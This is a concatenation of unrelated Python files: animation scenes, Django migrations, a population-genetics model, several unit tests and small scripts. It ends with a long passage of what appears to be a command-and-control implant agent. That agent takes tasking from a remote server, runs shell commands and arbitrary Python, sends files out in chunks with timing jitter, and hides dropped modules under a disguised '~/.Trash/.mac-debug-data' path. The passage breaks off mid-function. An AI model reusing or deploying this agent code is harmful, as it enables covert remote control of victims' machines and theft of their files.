GrowFromPoint(book, mathy.get_corner(UP+LEFT)),
)
self.play(morty.change, "pondering", book)
self.wait(3)
self.play(Blink(mathy))
self.wait()
self.play(
Animation(
BackgroundRectangle(book, fill_opacity = 1),
remover = True
),
FadeOut(book),
)
print(self.num_plays)
self.play(
FadeOut(words),
ShowCreation(rect),
morty.restore,
morty.change, "happy", rect,
FadeOut(mathy),
)
self.wait(10)
self.play(ShowCreation(url_rect))
self.play(
FadeOut(url_rect),
url.get_part_by_tex("3b1b").set_color, BLUE,
)
self.wait(15)
class PuzzleStatement(Scene):
def construct(self):
aops_logo = AoPSLogo()
url = TextMobject("AoPS.com/3b1b")
url.next_to(aops_logo, UP)
group = VGroup(aops_logo, url)
group.to_edge(UP)
self.add(group)
words = TextMobject("""
AoPS must choose one of 20 people to send to a
tug-of-war tournament. We don't care who we send,
as long as we don't send our weakest person. \\\\ \\\\
Each person has a different strength, but we don't know
those strengths. We get 10 intramural 10-on-10 matches
to determine who we send. Can we make sure we don't send
the weakest person?
""", alignment = "")
words.set_width(FRAME_WIDTH - 2)
words.next_to(group, DOWN, LARGE_BUFF)
self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))
self.wait(2)
class UncertaintyEndScreen(PatreonEndScreen):
CONFIG = {
"specific_patrons" : [
"CrypticSwarm",
"Ali Yahya",
"Juan Benet",
"Markus Persson",
"Damion Kistler",
"Burt Humburg",
"Yu Jun",
"Dave Nicponski",
"Kaustuv DeBiswas",
"Joseph John Cox",
"Luc Ritchie",
"Achille Brighton",
"Rish Kundalia",
"Yana Chernobilsky",
"Shìmín Kuang",
"Mathew Bramson",
"Jerry Ling",
"Mustafa Mahdi",
"Meshal Alshammari",
"Mayank M. Mehrotra",
"Lukas Biewald",
"Robert Teed",
"Samantha D. Suplee",
"Mark Govea",
"John Haley",
"Julian Pulgarin",
"Jeff Linse",
"Cooper Jones",
"Desmos ",
"Boris Veselinovich",
"Ryan Dahl",
"Ripta Pasay",
"Eric Lavault",
"Randall Hunt",
"Andrew Busey",
"Mads Elvheim",
"Tianyu Ge",
"Awoo",
"Dr. David G. Stork",
"Linh Tran",
"Jason Hise",
"Bernd Sing",
"James H. Park",
"Ankalagon ",
"Mathias Jansson",
"David Clark",
"Ted Suzman",
"Eric Chow",
"Michael Gardner",
"David Kedmey",
"Jonathan Eppele",
"Clark Gaebel",
"Jordan Scales",
"Ryan Atallah",
"supershabam ",
"1stViewMaths",
"Jacob Magnuson",
"Chloe Zhou",
"Ross Garber",
"Thomas Tarler",
"Isak Hietala",
"Egor Gumenuk",
"Waleed Hamied",
"Oliver Steele",
"Yaw Etse",
"David B",
"Delton Ding",
"James Thornton",
"Felix Tripier",
"Arthur Zey",
"George Chiesa",
"Norton Wang",
"Kevin Le",
"Alexander Feldman",
"David MacCumber",
"Jacob Kohl",
"Frank Secilia",
"George John",
"Akash Kumar",
"Britt Selvitelle",
"Jonathan Wilson",
"Michael Kunze",
"Giovanni Filippi",
"Eric Younge",
"Prasant Jagannath",
"Andrejs olins",
"Cody Brocious",
],
}
class Thumbnail(Scene):
def construct(self):
uncertainty_principle = TextMobject("Uncertainty \\\\", "principle")
uncertainty_principle[1].shift(SMALL_BUFF*UP)
quantum = TextMobject("Quantum")
VGroup(uncertainty_principle, quantum).scale(2.5)
uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)
quantum.to_edge(DOWN, MED_LARGE_BUFF)
arrow = TexMobject("\\Downarrow")
arrow.scale(4)
arrow.move_to(Line(
uncertainty_principle.get_bottom(),
quantum.get_top(),
))
cross = Cross(arrow)
cross.set_stroke(RED, 20)
is_word, not_word = is_not = TextMobject("is", "\\emph{NOT}")
is_not.scale(3)
is_word.move_to(arrow)
# is_word.shift(0.6*UP)
not_word.set_color(RED)
not_word.set_stroke(RED, 3)
not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)
not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)
dot_cloud = ProbabalisticDotCloud(
n_copies = 1000,
)
dot_gdw = dot_cloud.gaussian_distribution_wrapper
# dot_gdw.rotate(3*DEGREES)
dot_gdw.rotate(25*DEGREES)
# dot_gdw.scale(2)
dot_gdw.scale(2)
# dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)
dot_gdw.move_to(quantum)
def get_func(a):
return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)
axes = Axes(
x_min = -6, x_max = 6,
x_axis_config = {"unit_size" : 0.25}
)
graphs = VGroup(*[
axes.get_graph(get_func(a))
for a in (10, 3, 1, 0.3, 0.1,)
])
graphs.arrange(DOWN, buff = 0.6)
graphs.to_corner(UP+LEFT)
graphs.set_color_by_gradient(BLUE_B, BLUE_D)
frequency_axes = Axes(
x_min = 0, x_max = 2,
x_axis_config = {"unit_size" : 1}
)
fourier_graphs = VGroup(*[
get_fourier_graph(
frequency_axes, graph.underlying_function,
t_min = -10, t_max = 10,
)
for graph in graphs
])
for graph, fourier_graph in zip(graphs, fourier_graphs):
fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)
fourier_graph.scale(3)
fourier_graph.stretch(3, 1)
fourier_graph.move_to(graph)
fourier_graph.to_edge(RIGHT)
self.add(graphs, fourier_graphs)
self.add(dot_cloud)
self.add(
uncertainty_principle, quantum,
)
self.add(arrow, cross)
# self.add(is_word)
# self.add(is_not)
|
# Generated by Django 2.0.1 on 2018-01-28 04:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20180128_1003'),
]
operations = [
migrations.AlterField(
model_name='letter',
name='subject',
field=models.CharField(max_length=100),
),
]
|
"""
Custom demographic model for our example.
"""
import numpy
import dadi
def prior_onegrow_mig(params, ns, pts):
    """
    Model with growth, split, bottleneck in pop2, exp recovery, migration
    params = (nu1F, nu2B, nu2F, m, Tp, T)
    nu1F: The ancestral population size after growth. (Its initial size is
          defined to be 1.)
    nu2B: The bottleneck size for pop2
    nu2F: The final size for pop2
    m: The scaled migration rate
    Tp: The scaled time between ancestral population growth and the split.
    T: The time between the split and present
    ns = (n1, n2): Size of fs to generate.
    pts: Number of points to use in grid for evaluation.
    """
    # Tuple-parameter unpacking in the signature is Python 2 only, so unpack here.
    nu1F, nu2B, nu2F, m, Tp, T = params
    n1, n2 = ns
    # Define the grid we'll use
    xx = yy = dadi.Numerics.default_grid(pts)
# phi for the equilibrium ancestral population
phi = dadi.PhiManip.phi_1D(xx)
# Now do the population growth event.
phi = dadi.Integration.one_pop(phi, xx, Tp, nu=nu1F)
# The divergence
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
# We need to define a function to describe the non-constant population 2
# size. lambda is a convenient way to do so.
nu2_func = lambda t: nu2B*(nu2F/nu2B)**(t/T)
phi = dadi.Integration.two_pops(phi, xx, T, nu1=nu1F, nu2=nu2_func,
m12=m, m21=m)
# Finally, calculate the spectrum.
sfs = dadi.Spectrum.from_phi(phi, (n1,n2), (xx,yy))
return sfs
def prior_onegrow_mig_mscore(params):
    """
    ms core command corresponding to prior_onegrow_mig
    """
    nu1F, nu2B, nu2F, m, Tp, T = params
# Growth rate
alpha2 = numpy.log(nu2F/nu2B)/T
command = "-n 1 %(nu1F)f -n 2 %(nu2F)f "\
"-eg 0 2 %(alpha2)f "\
"-ma x %(m)f %(m)f x "\
"-ej %(T)f 2 1 "\
"-en %(Tsum)f 1 1"
# There are several factors of 2 necessary to convert units between dadi
# and ms.
sub_dict = {'nu1F':nu1F, 'nu2F':nu2F, 'alpha2':2*alpha2,
'm':2*m, 'T':T/2, 'Tsum':(T+Tp)/2}
return command % sub_dict
def prior_onegrow_nomig(params, ns, pts):
"""
Model with growth, split, bottleneck in pop2, exp recovery, no migration
nu1F: The ancestral population size after growth. (Its initial size is
defined to be 1.)
nu2B: The bottleneck size for pop2
nu2F: The final size for pop2
Tp: The scaled time between ancestral population growth and the split.
T: The time between the split and present
n1,n2: Size of fs to generate.
pts: Number of points to use in grid for evaluation.
"""
    nu1F, nu2B, nu2F, Tp, T = params
    return prior_onegrow_mig((nu1F, nu2B, nu2F, 0, Tp, T), ns, pts)
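# Usage sketch (illustrative; the parameter values and sample sizes below are
# hypothetical): dadi models are typically wrapped for grid extrapolation
# before being evaluated, e.g.
#   func_ex = dadi.Numerics.make_extrap_func(prior_onegrow_mig)
#   fs = func_ex((2.0, 0.1, 2.0, 1.0, 0.2, 0.2), (20, 20), [40, 50, 60])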
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
TEST WIDGET SELECTION.
Test widget selection effects.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
__all__ = ['SelectionTest']
from test._utils import MenuUtils, surface
import copy
import unittest
from pygame_menu.widgets import Button
from pygame_menu.widgets.selection import LeftArrowSelection, RightArrowSelection, \
HighlightSelection, NoneSelection, SimpleSelection
from pygame_menu.widgets.core.selection import Selection
from pygame_menu.widgets.selection.arrow_selection import ArrowSelection
class SelectionTest(unittest.TestCase):
def setUp(self) -> None:
"""
Setup sound engine.
"""
self.menu = MenuUtils.generic_menu()
self.menu.enable()
def test_copy(self) -> None:
"""
Test copy.
"""
s = LeftArrowSelection()
s1 = copy.copy(s)
s2 = copy.deepcopy(s)
s3 = s.copy()
self.assertNotEqual(s, s1)
self.assertNotEqual(s, s2)
self.assertNotEqual(s, s3)
def test_abstracts(self) -> None:
"""
Test abstract objects errors.
"""
w = Button('epic')
# Create abstract selection object
sel = Selection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: sel.draw(surface, w))
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_arrow(self) -> None:
"""
Test arrow selection.
"""
w = Button('epic')
w.set_selection_effect(LeftArrowSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
w.set_selection_effect(RightArrowSelection())
self.menu.draw(surface)
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_highlight(self) -> None:
"""
Test highlight selection.
"""
w = Button('epic')
border_width = 1
margin_x = 18
margin_y = 10
w.set_selection_effect(HighlightSelection(
border_width=border_width,
margin_x=margin_x,
margin_y=margin_y
))
self.menu.add.generic_widget(w)
self.menu.draw(surface)
# noinspection PyTypeChecker
sel: 'HighlightSelection' = w.get_selection_effect()
self.assertEqual(sel.get_height(), margin_y)
self.assertEqual(sel.get_width(), margin_x)
# Test inflate
rect = w.get_rect()
inflate_rect = sel.inflate(rect)
self.assertEqual(-inflate_rect.x + rect.x, sel.get_width() / 2)
self.assertEqual(-inflate_rect.y + rect.y, sel.get_height() / 2)
# Test margin xy
sel.margin_xy(10, 20)
self.assertEqual(sel.margin_left, 10)
self.assertEqual(sel.margin_right, 10)
self.assertEqual(sel.margin_top, 20)
self.assertEqual(sel.margin_bottom, 20)
# Test null border
sel._border_width = 0
sel.draw(surface, w)
def test_none(self) -> None:
"""
Test none selection.
"""
w = Button('epic')
w.set_selection_effect(NoneSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertFalse(w.get_selection_effect().widget_apply_font_color)
# Widgets default selection effect is None
last_selection = w.get_selection_effect()
w.set_selection_effect()
self.assertIsInstance(w.get_selection_effect(), NoneSelection)
self.assertNotEqual(w.get_selection_effect(), last_selection)
def test_simple(self) -> None:
"""
Test simple selection.
"""
w = Button('epic')
w.set_selection_effect(SimpleSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertTrue(w.get_selection_effect().widget_apply_font_color)
|
n = int(input("Enter a number : "))
s = 0
num =n
while(n>0):
r = n % 10
s = s + r* r* r
n = n//10
if(s==num):
print("The number is Armstrong")
else:
print("The number is not Armstrong")
|
# Generated by Django 3.1.6 on 2021-04-14 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("websites", "0016_remove_site_content_type_constraint"),
]
operations = [
migrations.RenameField(
model_name="websitecontent",
old_name="hugo_filepath",
new_name="content_filepath",
),
]
|
COLOR = ((1, 0, 0), (0, 1, 0), (1, 0, 1), (1, 1, 0), (0, 162 / 255, 232 / 255), (0.5, 0.5, 0.5), (0, 0, 1), (0, 1, 1),
(136 / 255, 0, 21 / 255), (255 / 255, 127 / 255, 39 / 255), (0, 0, 0))
LINE_STYLE = ['-', '--', ':', '-', '--', ':', '-', '--', ':', '-']
MARKER_STYLE = ['o', 'v', '<', '*', 'D', 'x', '.', 'x', '<', '.']
|
import unittest
from fqfa.validator.create import create_validator
class TestCreateValidator(unittest.TestCase):
def test_create_from_string(self) -> None:
# case sensitive
validator = create_validator("ACGT")
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator("ACGT", case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
def test_create_from_list(self) -> None:
# case sensitive
validator = create_validator(list("ACGT"))
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator(list("ACGT"), case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# invalid list arguments
self.assertRaises(ValueError, create_validator, ["A", "C", "GT"])
self.assertRaises(
ValueError, create_validator, ["A", "C", "GT"], case_sensitive=False
)
self.assertRaises(ValueError, create_validator, ["A", "C", ""])
self.assertRaises(
ValueError, create_validator, ["A", "C", ""], case_sensitive=False
)
if __name__ == "__main__":
unittest.main()
|
from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
|
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
            if 'Cookie' in headers:
                headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
            else:
                headers['Cookie'] = headerValue
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
    +------+--------------------+----------+---------+--------+-----------+
    | Type | total # of packets | packet # | task ID | Length | task data |
    +------+--------------------+----------+---------+--------+-----------+
    |  2   |         2          |    2     |    2    |   4    | <Length>  |
    +------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
            packetData += b'=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
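# Worked example (illustrative only): a type-40 response carrying the string "id"
# is 12 header bytes followed by the base64-encoded task data, i.e.
#   struct.pack('=H', 40) + struct.pack('=H', 1) + struct.pack('=H', 1)
#   + struct.pack('=H', 0) + struct.pack('=L', 4) + base64.b64encode(b"id")
# since base64.b64encode(b"id") == b"aWQ=" is 4 bytes long.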
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
    +------+--------------------+----------+---------+--------+-----------+
    | Type | total # of packets | packet # | task ID | Length | task data |
    +------+--------------------+----------+---------+--------+-----------+
    |  2   |         2          |    2     |    2    |   4    | <Length>  |
    +------+--------------------+----------+---------+--------+-----------+
    Returns a tuple of
    (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
"""
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
    global missedCheckins
    try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = b""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
# dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
# directory list
cmdargs = data
path = '/' # default to root
if cmdargs is not None and cmdargs != '' and cmdargs != '/': # strip trailing slash for uniformity
path = cmdargs.rstrip('/')
if path[0] != '/': # always scan relative to root for uniformity
path = '/{0}'.format(path)
if not os.path.isdir(path):
send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
        # dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
# base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
# base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
# view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
